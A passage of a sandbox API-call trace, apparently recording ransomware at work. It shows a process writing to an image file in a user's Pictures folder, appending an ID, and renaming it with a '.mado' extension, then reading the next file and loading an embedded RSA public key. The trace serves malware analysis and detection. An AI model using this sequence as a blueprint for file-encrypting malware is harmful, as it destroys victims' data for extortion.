(HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.170] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.170] GetLastError () returned 0x0 [0207.170] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.170] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.170] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.170] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.170] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12440) returned 0x3b87c98 [0207.171] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0207.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b874d8 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87520 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79da0 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e18 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0207.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0207.172] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e18 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e18 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79de8 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79dd0 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b75968 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b75a80 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0207.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e18 | out: hHeap=0x2c0000) returned 1 [0207.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0207.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.173] GetCurrentThreadId () returned 0x600 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b778 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x32c64e8 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b819c0 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.173] GetCurrentThreadId () returned 0x600 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81bd0 [0207.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b818b8 [0207.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e18 [0207.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0207.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0207.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79db8 [0207.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e30 [0207.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0207.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e00 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e48 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e18 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75968 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e48 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b75b98 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75cb0 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0207.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0207.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81ac8 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81bd0 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81ac8 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75cb0 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b98 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e00 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e30 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819c0 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87520 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818b8 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0207.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.177] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0x12436, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0x12436, lpOverlapped=0x0) returned 1 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0207.177] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1243b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.177] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0207.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0207.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.178] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0207.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0207.178] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.178] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.178] CloseHandle (hObject=0x63c) returned 1 [0207.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67078 [0207.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f0) returned 0x3b7b950 [0207.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0207.179] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\FpK8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\fpk8.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\FpK8.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\fpk8.bmp.mado")) returned 1 [0207.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.180] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0207.181] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc302170, ftCreationTime.dwHighDateTime=0x1d5dc46, ftLastAccessTime.dwLowDateTime=0x407b3c40, ftLastAccessTime.dwHighDateTime=0x1d5e1eb, ftLastWriteTime.dwLowDateTime=0x407b3c40, ftLastWriteTime.dwHighDateTime=0x1d5e1eb, nFileSizeHigh=0x0, nFileSizeLow=0x17797, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LJ8cwi.png", cAlternateFileName="")) returned 1 [0207.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x136) returned 0x336fe98 [0207.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.181] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\LJ8cwi.png") returned=".png" [0207.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\LJ8cwi.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\lj8cwi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.181] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=96151) returned 1 [0207.181] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.184] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17771, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.184] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.185] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.185] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x17797, lpOverlapped=0x0) returned 1 [0207.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.186] RtlAllocateHeap 